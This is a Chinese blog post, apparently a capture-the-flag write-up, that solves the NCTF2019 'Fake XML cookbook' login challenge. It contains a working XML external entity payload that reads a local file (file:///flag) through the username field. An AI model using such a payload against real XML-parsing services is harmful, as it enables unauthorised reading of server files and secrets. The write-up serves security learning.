首页 > 其他分享 >[NCTF2019]Fake XML cookbook

[NCTF2019]Fake XML cookbook

时间:2024-02-08 11:11:27浏览次数:29  
标签:XML xml NCTF2019 Fake cookbook 注入

[NCTF2019]Fake XML cookbook

y2DYUIdSm_LDX59b4Ccd9dcvIfcgXpTX25camqcVzZc

打卡环境是一个登录页面,根据题目名字就能看出来和xml有关,和xml有关的那就是注入,brup抓包看下数据包,结果如下:

EJIi98R-a2m7I-OStcEWMW6FbS5ze5rjGwK-WWim6cQ

发现username和password是xml格式,尝试XML外部实体注入得到flag

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY test SYSTEM "file:///flag">
  ]>
<user><username>&test;</username><password>1</password></user>

54AUo7ctejbiFGBhrHqWc5JAovQ2uxy8CfAGteAVb3w

关于XML注入内容的补充:https://xz.aliyun.com/t/6887#toc-0

标签:XML,xml,NCTF2019,Fake,cookbook,注入
From: https://www.cnblogs.com/fishjumpriver/p/18011661

相关文章

  • js XML 命名空间
    Node的变化在DOM2中,Node类型包含以下特定于命名空间的属性:namespaceURI,节点的命名空间URL,如果未指定则为null;prefix,命名空间前缀,如果未指定则为null。在节点使用命名空间前缀的情况下,nodeName等于prefix+":"+localName。比如下面这个例子:<head><title>Example......
  • 【JAVA】Java 使用 XPath表达式定位节点读取自定义XML方法
    *加载配置文件节点*@paramattributeValue节点属性值*@paramareaCode节点属性值*/publicstaticMap<String,String>getConfigXml(StringattributeValue,StringareaCode){StringfilePath="config.xml";Map<St......
  • MyBatis的XML配置文件及注释
    mybatis.xml<?xmlversion="1.0"encoding="UTF-8"?><!DOCTYPEconfigurationPUBLIC"-//mybatis.org//DTDConfig3.0//EN""http://mybatis.org/dtd/mybatis-3-config.dtd"><configuration>......
  • Spring-xml(+注解)方式整合第三方的框架-mybatis
    1)不需要自定义命名空间:MyBatisSpring整合Mybatis的步骤如下://原始配置<dependency><groupId>mysql</groupId><artifactId>mysql-connector-java</artifactId><version>5.1.49</version></dependency><dependenc......
  • XmlDocument 解决 Clone、CloneNode、ImportNode 等节点克隆后的标签自闭合问题
    前言:这两天在对Taurus.Mvc 做html 加载性能优化时,发现存在这个问题。具体优化的是CYQ.Data 组件的XHtmlAction 相关类。问题过程:之前XmlDocument 调用 LoadXml(xml)之后,缓存对象,再次使用时,都是重新LoadXml:XmlDocumentnewDoc=newXmlDocument();......
  • mybatis xml 中的 大于、小于、等于 写法
    字符名称原符号替换符号小于<&lt;小于等于<=&lt;=大于>&gt;大于等于\>=&gt;=不等于<>&lt;&gt;与&&amp;单引号'&apos;双引号"&quot;......
  • MyBatis xml查询,如何可以查询返回boolean类型 ,怎么写,数据存在就返回true,不存在就fals
    您可以在MyBatis的查询方法中,使用COUNT函数查询指定数据是否存在。如果COUNT的返回值为0,表示数据不存在,反之则存在。以下是一个示例:<selectid="dataExists"resultType="boolean">SELECTCOUNT(*)>0ASexistsFROMyour_tableWHEREyour_condition=#......
  • java读取并解析XML文件的方法有哪些?
    XMLStreamReader:1. DOM(DocumentObjectModel)方式:DOM将整个XML文档加载到内存中,形成一颗树状结构,然后通过操作这个树状结构来获取所需要的数据。示例代码如下:importjavax.xml.parsers.*;importorg.w3c.dom.*;publicclassXMLParser{publicstaticvoidmain(Stri......
  • AndroidStudio 编辑xml布局文件卡死问题解决
    之前项目编写的都是正常,升级AndroidStudio后编辑布局文件就卡死,还以为是AndroidStudio文件。其实不然,我给整个项目增加了版权声明。所以全部跟新后,布局文件也增加了版权声明。估计AndroidStudio在解析布局文件时候因为有版权声明的原因导致卡死,所以删除版权声明就可以了。可以......
  • logback.xml配置文件模板
    1<?xmlversion="1.0"encoding="UTF-8"?>2<configuration>3<!--4CONSOLE:表示当前的日志信息是可以输出到控制台的。5-->6<appendername="CONSOLE"class="ch.qos.logback.core.ConsoleAppender......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99